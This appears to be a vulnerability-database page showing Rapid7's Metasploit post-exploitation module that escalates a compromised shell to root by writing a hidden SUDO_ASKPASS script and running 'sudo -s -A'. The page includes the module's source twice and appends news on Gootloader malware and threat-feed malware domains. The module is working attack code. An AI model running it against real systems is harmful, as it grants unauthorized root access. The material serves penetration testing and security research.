ID MSF:POST/MULTI/MANAGE/SUDO Type metasploit Reporter Rapid7 Modified 2020-07-23T13:04:20
Description
This module attempts to upgrade a shell account to UID 0 by reusing the given password and passing it to sudo. This technique relies on sudo versions from 2008 and later which support -A.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  # Module metadata and options.
  #
  # Registers a single optional datastore option, PASSWORD. When it is
  # left unset, get_root falls back to the parent session's exploit
  # datastore (see get_root below).
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info={})
    super( update_info( info,
      'Name' => 'Multiple Linux / Unix Post Sudo Upgrade Shell',
      'Description' => %q{
        This module attempts to upgrade a shell account to UID 0 by reusing the
        given password and passing it to sudo. This technique relies on sudo
        versions from 2008 and later which support -A.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'todb <todb[at]metasploit.com>',
          'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option
        ],
      'Platform' => %w{ aix linux osx solaris unix },
      'References' =>
        [
          # Askpass first added March 2, 2008, looks like
          [ 'URL', 'http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h']
        ],
      'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter'
    ))

    register_options(
      [
        # Optional (false): an empty/nil value selects the passwordless path.
        OptString.new('PASSWORD', [false, 'The password to use when running sudo.'])
      ])
  end

  # Run Method for when run command is issued
  #
  # Resolves the sudo binary with `which sudo`, then returns early when the
  # session is already root or when no sudo binary was found; otherwise
  # hands off to get_root. Note that the `which sudo` command is sent to
  # the session before the is_root? check, so one remote command is issued
  # even when the session is already root.
  # is_root? is presumably provided by the Msf::Post::Linux::Priv mixin
  # included above — not visible in this file.
  #
  # @return [void]
  def run
    print_status("SUDO: Attempting to upgrade to UID 0 via sudo")
    # Issued unconditionally, before the root check below.
    sudo_bin = cmd_exec("which sudo")
    if is_root?
      print_status "Already root, so no need to upgrade permissions. Aborting."
      return
    end
    if sudo_bin.empty?
      print_error "No sudo binary available. Aborting."
      return
    end
    get_root()
  end

  # Selects the password to use, runs the sudo attempt and records the
  # outcome.
  #
  # The password comes from this module's PASSWORD option when set,
  # otherwise from the parent session's exploit datastore. An empty or nil
  # password means a passwordless `sudo -s` is attempted instead.
  # NOTE(review): the chosen password is printed verbatim by print_status
  # below, so it ends up in the console output / session log in cleartext.
  # On success a "host.escalation" note is reported against the session.
  #
  # @return [void]
  def get_root
    if datastore['PASSWORD']
      password = datastore['PASSWORD']
    else
      password = session.exploit_datastore['PASSWORD']
    end

    if password.to_s.empty?
      print_status "No password available, trying a passwordless sudo."
    else
      # Cleartext password in the status line (see note above).
      print_status "Sudoing with password `#{password}'."
    end
    askpass_sudo(password)
    # Success is judged solely by re-checking the session's uid afterwards.
    unless is_root?
      print_error "SUDO: Didn't work out, still a mere user."
    else
      print_good "SUDO: Root shell secured."
      report_note(
        :host => session,
        :type => "host.escalation",
        :data => "User `#{session.exploit_datastore['USERNAME']}' sudo'ed to a root shell"
      )
    end
  end

  # TODO: test on more platforms
  #
  # Runs sudo either directly (no password) or through a SUDO_ASKPASS
  # helper script that echoes the password back to sudo's -A prompt.
  #
  # Passwordless path: `sudo -s` under a 30 second timeout.
  # Password path: writes a dot-prefixed, randomly named helper script
  # under /tmp, marks it executable, sets SUDO_ASKPASS with both csh-style
  # `setenv` and sh-style `export` (whichever the remote shell accepts),
  # then runs `sudo -s -A`; a single 120 second timeout covers the whole
  # sequence.
  #
  # NOTE(review): askpass_cleanup is never invoked here (the call at the
  # end is commented out), so the helper script — which holds the password
  # in cleartext — remains on the target filesystem after this method
  # returns.
  # NOTE(review): the password is interpolated into the helper script
  # inside single quotes with no escaping applied.
  # The bare `rescue` clauses below catch StandardError only.
  #
  # @param password [String, nil] password to feed to sudo; empty or nil
  #   selects the passwordless attempt
  # @return [void]
  def askpass_sudo(password)
    if password.to_s.empty?
      begin
        ::Timeout.timeout(30) do
          cmd_exec("sudo -s")
        end
      rescue ::Timeout::Error
        print_error "SUDO: Passwordless sudo timed out. Might be blocking."
      rescue
        print_error "SUDO: Passwordless sudo failed. Check the session log."
      end
    else
      # Dot-prefixed random name under /tmp; this path is written to the
      # target and exported as SUDO_ASKPASS below.
      askpass_sh = "/tmp/." + Rex::Text.rand_text_alpha(7)
      begin
        # Telnet can be pretty pokey, allow about 20 seconds per cmd_exec
        # Generally will be much snappier over ssh.
        # Need to timeout in case there's a blocking prompt after all
        ::Timeout.timeout(120) do
          vprint_status "Writing the SUDO_ASKPASS script: #{askpass_sh}"
          # Helper script body: a one-line sh script that echoes the password.
          write_file(askpass_sh, "#!/bin/sh\necho '#{password}'\n")
          vprint_status "Setting executable bit."
          cmd_exec("chmod +x #{askpass_sh}")
          vprint_status "Setting environment variable."
          # Bruteforce the set command. At least one should work.
          cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}")
          cmd_exec("export SUDO_ASKPASS=#{askpass_sh}")
          vprint_status "Executing sudo -s -A"
          cmd_exec("sudo -s -A")
        end
      rescue ::Timeout::Error
        print_error "SUDO: Sudo with a password timed out."
      rescue
        print_error "SUDO: Sudo with a password failed. Check the session log."
      end
      # Cleanup is disabled; the helper script is left in place on the target.
      # askpass_cleanup(askpass_sh)
    end
  end

  # Removes the SUDO_ASKPASS helper script written by askpass_sudo.
  #
  # Currently unused: its only call site (in askpass_sudo) is commented
  # out. Only a timeout is rescued here; any other error raised by
  # cmd_exec propagates to the caller.
  #
  # @param askpass_sh [String] remote path of the helper script
  # @return [void]
  def askpass_cleanup(askpass_sh)
    begin
      ::Timeout.timeout(20) do
        vprint_status "Deleting the SUDO_ASKPASS script."
        cmd_exec("rm #{askpass_sh}")
      end
    rescue ::Timeout::Error
      print_error "Timed out during sudo cleanup."
    end
  end
end
{"id": "MSF:POST/MULTI/MANAGE/SUDO", "type": "metasploit", "bulletinFamily": "exploit", "title": "Multiple Linux / Unix Post Sudo Upgrade Shell", "description": "This module attempts to upgrade a shell account to UID 0 by reusing the given password and passing it to sudo. This technique relies on sudo versions from 2008 and later which support -A.\n", "published": "2011-11-18T16:16:57", "modified": "2020-07-23T13:04:20", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h"], "cvelist": [], "lastseen": "2020-07-25T00:06:00", "viewCount": 151, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2020-07-25T00:06:00", "rev": 2}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4BE360A9A825DEBBCADB05F3EE6777F0", "TRENDMICROBLOG:380ED8C8259FF30CA69F0998B6225978", "TRENDMICROBLOG:C8C4950B7C1ABCC3623954974416E5A2"]}, {"type": "hackread", "idList": ["HACKREAD:79B4C6B773EFFE1B97264FE830243A65"]}, {"type": "kitploit", "idList": ["KITPLOIT:1171667579156198567", "KITPLOIT:3516084899857192644", "KITPLOIT:5416094341903135271"]}, {"type": "mssecure", "idList": ["MSSECURE:13C42846F104475D763DA4BFC93C0B2D", "MSSECURE:D004CE78869D49C5649EBAD1CF6E6591", "MSSECURE:8758A81935434F705333701EA00BF404"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1037-1"]}, {"type": "thn", "idList": ["THN:4BA22F23EA755CF350D79FDE871D4377", "THN:3BB9B59BEF87F98A7DFFEA8DC0CCB025"]}, {"type": "nessus", "idList": ["SUSE_SU-2020-2008-1.NASL", "SUSE_SU-2020-1970-1.NASL", "OPENSUSE-2020-804.NASL"]}, {"type": "securelist", "idList": ["SECURELIST:9C375DB331E2434EE824100A45629096"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5766"]}, {"type": "threatpost", "idList": ["THREATPOST:2A10807088DDCBC0F545D9C6870DD195"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:F8C45CBFA2F30D350118B999AB93C2BA"]}], "modified": "2020-07-25T00:06:00", "rev": 2}, "vulnersScore": 
0.1}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/multi/manage/sudo.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Multiple Linux / Unix Post Sudo Upgrade Shell',\n 'Description' => %q{\n This module attempts to upgrade a shell account to UID 0 by reusing the\n given password and passing it to sudo. This technique relies on sudo\n versions from 2008 and later which support -A.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'todb <todb[at]metasploit.com>',\n 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option\n ],\n 'Platform' => %w{ aix linux osx solaris unix },\n 'References' =>\n [\n # Askpass first added March 2, 2008, looks like\n [ 'URL', 'http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h']\n ],\n 'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter'\n ))\n\n register_options(\n [\n OptString.new('PASSWORD', [false, 'The password to use when running sudo.'])\n ])\n end\n\n # Run Method for when run command is issued\n def run\n print_status(\"SUDO: Attempting to upgrade to UID 0 via sudo\")\n sudo_bin = cmd_exec(\"which sudo\")\n if is_root?\n print_status \"Already root, so no need to upgrade permissions. Aborting.\"\n return\n end\n if sudo_bin.empty?\n print_error \"No sudo binary available. 
Aborting.\"\n return\n end\n get_root()\n end\n\n def get_root\n if datastore['PASSWORD']\n password = datastore['PASSWORD']\n else\n password = session.exploit_datastore['PASSWORD']\n end\n\n if password.to_s.empty?\n print_status \"No password available, trying a passwordless sudo.\"\n else\n print_status \"Sudoing with password `#{password}'.\"\n end\n askpass_sudo(password)\n unless is_root?\n print_error \"SUDO: Didn't work out, still a mere user.\"\n else\n print_good \"SUDO: Root shell secured.\"\n report_note(\n :host => session,\n :type => \"host.escalation\",\n :data => \"User `#{session.exploit_datastore['USERNAME']}' sudo'ed to a root shell\"\n )\n end\n end\n\n # TODO: test on more platforms\n def askpass_sudo(password)\n if password.to_s.empty?\n begin\n ::Timeout.timeout(30) do\n cmd_exec(\"sudo -s\")\n end\n rescue ::Timeout::Error\n print_error \"SUDO: Passwordless sudo timed out. Might be blocking.\"\n rescue\n print_error \"SUDO: Passwordless sudo failed. Check the session log.\"\n end\n else\n askpass_sh = \"/tmp/.\" + Rex::Text.rand_text_alpha(7)\n begin\n # Telnet can be pretty pokey, allow about 20 seconds per cmd_exec\n # Generally will be much snappier over ssh.\n # Need to timeout in case there's a blocking prompt after all\n ::Timeout.timeout(120) do\n vprint_status \"Writing the SUDO_ASKPASS script: #{askpass_sh}\"\n write_file(askpass_sh, \"#!/bin/sh\\necho '#{password}'\\n\")\n vprint_status \"Setting executable bit.\"\n cmd_exec(\"chmod +x #{askpass_sh}\")\n vprint_status \"Setting environment variable.\"\n # Bruteforce the set command. At least one should work.\n cmd_exec(\"setenv SUDO_ASKPASS #{askpass_sh}\")\n cmd_exec(\"export SUDO_ASKPASS=#{askpass_sh}\")\n vprint_status \"Executing sudo -s -A\"\n cmd_exec(\"sudo -s -A\")\n end\n rescue ::Timeout::Error\n print_error \"SUDO: Sudo with a password timed out.\"\n rescue\n print_error \"SUDO: Sudo with a password failed. 
Check the session log.\"\n end\n # askpass_cleanup(askpass_sh)\n end\n end\n\n def askpass_cleanup(askpass_sh)\n begin\n ::Timeout.timeout(20) do\n vprint_status \"Deleting the SUDO_ASKPASS script.\"\n cmd_exec(\"rm #{askpass_sh}\")\n end\n rescue ::Timeout::Error\n print_error \"Timed out during sudo cleanup.\"\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"threatpost": [{"lastseen": "2021-03-01T21:39:09", "bulletinFamily": "info", "cvelist": [], "description": "The Gootloader malware loader, previously used for distributing the Gootkit malware family, has undergone what researchers call a \u201crenaissance\u201d when it comes to payload delivery.\n\nNew research released this week paints Gootloader as an increasingly sophisticated loader framework, which has now expanded the number of payloads its delivers beyond Gootkit (and in some cases, the previously-distributed [REvil ransomware](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>)), to include the [Kronos trojan](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>) and the [Cobalt Strike](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) commodity malware.\n\nGootloader is known for its multi-stage attack process, obfuscation tactics, and for using a known tactic for malware delivery called search engine optimization (SEO) poisoning. This technique leverages SEO-friendly terms in attacker-controlled websites, in order to rank them higher in Google\u2019s search index. 
In the end, the method brings more eyeballs to the malicious sites, which contain links that launch the Gootloader attack chain.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe malware delivery method pioneered by the threat actors behind the REvil ransomware and the Gootkit banking Trojan has been enjoying a renaissance of late, as telemetry indicates that criminals are using the method to deploy an array of malware payloads in South Korea, Germany, France, and across North America,\u201d said Gabor Szappanos and Andrew Brandt, security researchers with Sophos Labs [on Monday](<https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728>).\n\n## **What is the Gootloader Malware Tool?**\n\nGootloader is a Javascript-based infection framework that was traditionally used for the Gootkit remote access trojan (RAT). The [Gootkit malware family](<https://threatpost.com/sload-malware-revamped-starslord-l-features/152084/>), which has been around for more than five years, has evolved over time into a mature trojans primarily aimed at stealing banking credentials.\n\nWhile Gootloader was previously used as a vehicle to merely deliver the Gootkit malware, \u201cIn recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself,\u201d said researchers.\n\nIn addition to its use of SEO poisoning, what sets Gootloader apart is its fileless malware delivery tactics, they said. 
Fileless malware uses trusted, legitimate processes (in the case of Gootloader, PowerShell, for instance) that allows the malware delivery mechanism to evade antivirus products.\n\n## **Gootloader Malware: Compromised, Legitimate Websites**\n\nIn order to perform SEO poisoning, Gootloader attackers have first compromised a wide variety of legitimate websites, which they maintain on a network of roughly 400 servers, said researchers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/01155723/gootloader-search-results-are-valid.png>)\n\nAn example of an Gootloader attack. Credit: Sophos Labs\n\nResearchers said, the operators of these legitimate, hacked websites do not seem to know their websites are being abused in this manner.\n\n\u201cIt isn\u2019t clear how the threat actors gain access to the backend of these sites, but historically, these kinds of website compromises may be the result of any of a number of methods: The attackers may simply obtain the sites\u2019 passwords from the Gootkit malware itself, or from any of a number of criminal markets that trade in stolen credentials, or by leveraging any of a number of security exploits in the plugins or add-ons of the CMS software,\u201d they said.\n\n## **Using Google Search Engine Optimization For Malware Delivery**\n\nGootloader attacker-compromised websites then tweak the content management systems of the websites to use key SEO tactics and terms. 
The goal here is to appear at the top of Google\u2019s index when certain questions are typed into Google search.\n\nFor instance, typing the question \u201cdo I need a party wall agreement to sell my house?\u201d turns up a legitimate website for a Canada-based neonatal medical practice, which has actually been compromised by Gootloader attackers.\n\nThe part of the website that has been compromised by attackers features a \u201cmessage board\u201d with a \u201cuser\u201d asking the question \u201cdo I need a party wall agreement to sell my house?\u201d This uses the exact same wording as the search query, as a way to rank higher on Google\u2019s search index \u2013 even if it has nothing to do with the actual content of the compromised website.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/01155805/gootloader-party-wall.png>)\n\nAn example of an Gootloader attack. Credit: Sophos Labs\n\nOn that \u201cmessage board,\u201d an \u201cadmin profile\u201d then responds to the question with a link purporting to have more information.\n\n\u201cNone of the site\u2019s legitimate content has anything to do with real estate transactions \u2013 its doctors deliver babies \u2013 and yet it is the first result to appear in a query about a very narrowly defined type of real estate agreement,\u201d said researchers. \u201cGoogle itself indicates the result is not an ad, and they have known about the site for nearly seven years. 
To the end user, the entire thing looks on the up-and-up.\u201d\n\nThreatpost has reached out to Google for more information on how the company is battling such SEO poisoning types of attacks.\n\n## **Gootloader Payload Delivery Mechanism**\n\nGootloader\u2019s payload delivery mechanism is complex and involves multiple stages.\n\nInitially, when the website user clicks on the \u201cadmin\u201d account\u2019s link on the compromised website, they receive a ZIP archive file with a filename (again matching the search query terms used in the initial search). This file then contains another JS file (with the same name). JS extension files involve a text file containing JavaScript code, used to execute JavaScript instructions in webpages; the specific JS files in this attack typically invoke the Windows Scripting Host (wscript.exe) when run.\n\n\u201cThis .js file is the initial infector, and the only stage of the infection at which a file is written to the filesystem,\u201d said researchers. 
\u201cEverything that happens after the target double-clicks this script runs entirely in memory, out of the reach of traditional endpoint protection tools.\u201d\n\nThe first-stage script, which is obfuscated, attempts to contact the command-and-control (C2) server \u2013 if it successfully does so, the second-stage malware process then creates an auto-run entry for a PowerShell script that doesn\u2019t execute until the system reboots, creating a stealthy way for attackers to sidestep detection.\n\n\u201cBecause this next stage doesn\u2019t completely execute until the next time the computer reboots, the target may not actually discover the infection until some hours or even days later \u2013 whenever they fully reboot Windows,\u201d said researchers.\n\nOnce the computer reboots, the PowerShell script runs and begins a dominoes-like sequence of events, ending with Gootloader attempting to download its final payload.\n\n\u201cThe Delphi loader contains the final payload \u2013 [Kronos](<https://threatpost.com/wannacry-hero-avoids-jail-time-in-kronos-malware-charges/146721/>), [REvil](<https://threatpost.com/revil-video-game-hit-revenue/160743/>), Gootkit, or [Cobalt Strike](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) \u2013 in encrypted form,\u201d said researchers. \u201cIn those cases, the loader decrypts the payload, then uses its own PE loader to execute the payload in memory.\u201d\n\n## **Other Malware Google SEO Abuse Tactics **\n\nThe abuse of SEO to gain more eyeballs and traction to malicious sites is an age-old trick for cybercriminals, with examples of this type of tactic [dating back to at least 2011](<https://threatpost.com/seo-poisoned-sites-still-slipping-google-012111/74869/>). 
In 2017, cybercriminals [poisoned Google search results](<https://threatpost.com/poisoned-search-results-deliver-banking-malware/128759/>) in the hope of infecting users with a banking Trojan called Zeus Panda, for instance.\n\nThese types of attacks continue because they work, said researchers.\n\n\u201cScript blockers like NoScript for Firefox could help a cautious web surfer remain safe by preventing the initial replacement of the hacked web page to happen, but not everyone uses those tools (or finds them convenient or even intuitive),\u201d they said. \u201cEven attentive users who are aware of the trick involving the fake forum page might not recognize it until it\u2019s too late.\u201d\n", "modified": "2021-03-01T21:23:42", "published": "2021-03-01T21:23:42", "id": "THREATPOST:84C4FA73431683A5F74B7C0D744C523A", "href": "https://threatpost.com/malware-loader-google-seo-payload/164377/", "type": "threatpost", "title": "Malware Loader Abuses Google SEO to Expand Payload Delivery", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2021-03-01T21:17:09", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20178", "CVE-2021-20180", "CVE-2021-20191", "CVE-2021-20228"], "description": "Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. 
", "modified": "2021-03-01T17:06:17", "published": "2021-03-01T17:06:17", "id": "FEDORA:3FEA730A9F55", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: ansible-2.9.18-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-01T21:17:09", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20178", "CVE-2021-20180", "CVE-2021-20191", "CVE-2021-20228"], "description": "Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. ", "modified": "2021-03-01T17:02:27", "published": "2021-03-01T17:02:27", "id": "FEDORA:BF8633094DF0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: ansible-2.9.18-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2021-03-01T14:27:53", "bulletinFamily": "info", "cvelist": [], "description": "[](<https://thehackernews.com/images/-R_Zsuk8vToA/YDz3Xko0qOI/AAAAAAAAB6Q/cNIHjigZOWIgTxlpUFAtkYnHJj8thwXlACLcBGAsYHQ/s0/hacking.jpg>)\n\nA framework notorious for delivering a banking Trojan has received a facelift to deploy a wider range of malware, including ransomware payloads.\n\n\"The [Gootkit](<https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit>) malware family has been around more than half a decade \u2013 a mature Trojan with functionality centered around banking credential theft,\" Sophos researchers Gabor Szappanos and Andrew Brandt [said](<https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options>) in a write-up published today.\n\n\"In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself.\"\n\nDubbed \"Gootloader,\" the expanded malware delivery system comes amid a surge in the 
number of infections targeting users in France, Germany, South Korea, and the U.S.\n\nFirst documented in 2014, Gootkit is a Javascript-based malware platform capable of carrying out an array of covert activities, including web injection, capturing keystrokes, taking screenshots, recording videos, as well as email and password theft.\n\nOver the years, the cybercrime tool has evolved to gain new information-stealing features, with the Gootkit loader [repurposed](<https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/>) in combination with REvil/Sodinokibi ransomware infections reported last year.\n\nWhile campaigns using social engineering tricks to deliver malicious payloads are a dime a dozen, Gootloader takes it to the next level.\n\nThe infection chain resorts to sophisticated techniques that involve hosting malicious ZIP archive files on websites belonging to legitimate businesses that have been gamed to appear among the top results of a search query using manipulated search engine optimization (SEO) methods.\n\n[](<https://thehackernews.com/images/-jKrl6_59sww/YDz3lj7iPzI/AAAAAAAAB6U/gkVDyYnfxSoxHtjCmVAhySHz6_vysIHvACLcBGAsYHQ/s0/malware.jpg>)\n\nWhat's more, the search engine results point to websites that have no \"logical\" connection to the search query, implying that the attackers must be in possession of a vast network of hacked websites. 
In one case spotted by the researchers, an advice for a real estate agreement surfaced a breached neonatal medical practice based in Canada as the first result.\n\n\"To ensure targets from the right geographies are captured, the adversaries rewrite website code 'on the go' so that website visitors who fall outside the desired countries are shown benign web content, while those from the right location are shown a page featuring a fake discussion forum on the topic they've queried,\" the researchers said.\n\nClicking the search result takes the user to a fake message board-like page that matches not only the search terms used in the initial query but also includes a link to the ZIP file, which contains a heavily obfuscated Javascript file that initiates the next stage of compromise to inject the fileless malware fetched from a remote server into memory.\n\nThis takes the form of a multi-stage evasive approach that begins with a .NET loader, which comprises a Delphi-based loader malware, which, in turn, contains the final payload in encrypted form.\n\nIn addition to delivering the REvil ransomware and the Gootkit trojan, multiple campaigns have been spotted currently leveraging the Gootloader framework to deliver the Kronos financial malware in Germany stealthily, and the Cobalt Strike post-exploitation tool in the U.S.\n\nIt's still unclear as to how the operators gain access to the websites to serve the malicious injects, but the researchers suspect the attackers may have obtained the passwords by installing the Gootkit malware or purchasing stolen credentials from underground markets, or by leveraging security flaws in present in the plugins used alongside content management system (CMS) software.\n\n\"The developers behind Gootkit appear to have shifted resources and energy from delivering just their own financial malware to creating a stealthy, complex delivery platform for all kinds of payloads, including REvil ransomware,\" said Gabor Szappanos, threat research 
director at Sophos.\n\n\"This shows that criminals tend to reuse their proven solutions instead of developing new delivery mechanisms. Further, instead of actively attacking endpoint tools as some malware distributors do, the creators of Gootloader have opted for convoluted evasive techniques that conceal the end result,\" he added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-03-01T14:18:35", "published": "2021-03-01T14:18:00", "id": "THN:2392425566C87B11BD57FA63C731A488", "href": "https://thehackernews.com/2021/03/gootkit-rat-using-seo-to-distribute.html", "type": "thn", "title": "Gootkit RAT Using SEO to Distribute Malware Through Compromised Sites", "cvss": {"score": 0.0, "vector": "NONE"}}], "rst": [{"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **accservice-manage[.]myvnc.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **34**.\n First seen: 2021-02-01T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 188[.]166.145.25\nWhois:\n Created: 2001-06-01 21:14:31, \n Registrar: TLDS LLC dba SRSPlus, \n Registrant: NoIPcom.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-01T00:00:00", "id": "RST:9585041A-2191-3D61-9A61-FF198F993A0D", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. 
IOC: accservice-manage.myvnc.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage-account[.]verifyapps.ijw9e8fjwo.co** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:BBD167A0-98E8-3787-9BCD-1A5452F1E3D8", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage-account.verifyapps.ijw9e8fjwo.co", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage-security[.]duckdns.org** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-20T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-20T00:00:00", "id": "RST:8504426E-28FE-308E-881A-8C5731C34579", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage-security.duckdns.org", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyapps.84tvy367y3.co** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:72AA6441-F1DC-3A01-A981-F9113759AD7B", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. 
IOC: manage.account-verifyapps.84tvy367y3.co", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyapps.c263hr242r.co** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:9E651D8C-3D7D-31C6-AE35-9FDEF4F157BD", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account-verifyapps.c263hr242r.co", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyapps.ctu346t3t34.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\nWhois:\n Created: 2020-07-10 22:48:27, \n Registrar: GoDaddycom LLC, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:0C2F3899-56C1-3BB5-81FA-E521401C7D2D", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. 
IOC: manage.account-verifyapps.ctu346t3t34.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyapps.dwa32r243xfxonline.xyz** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:A6AB63FB-AD7E-3CBF-A548-38BDD4528E46", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account-verifyapps.dwa32r243xfxonline.xyz", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyappsinf.c263hr242r.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\nWhois:\n Created: 2020-07-10 22:42:14, \n Registrar: GoDaddycom LLC, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:0C16E26B-DB4D-3E7B-8CEF-B43A68CDF05C", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. 
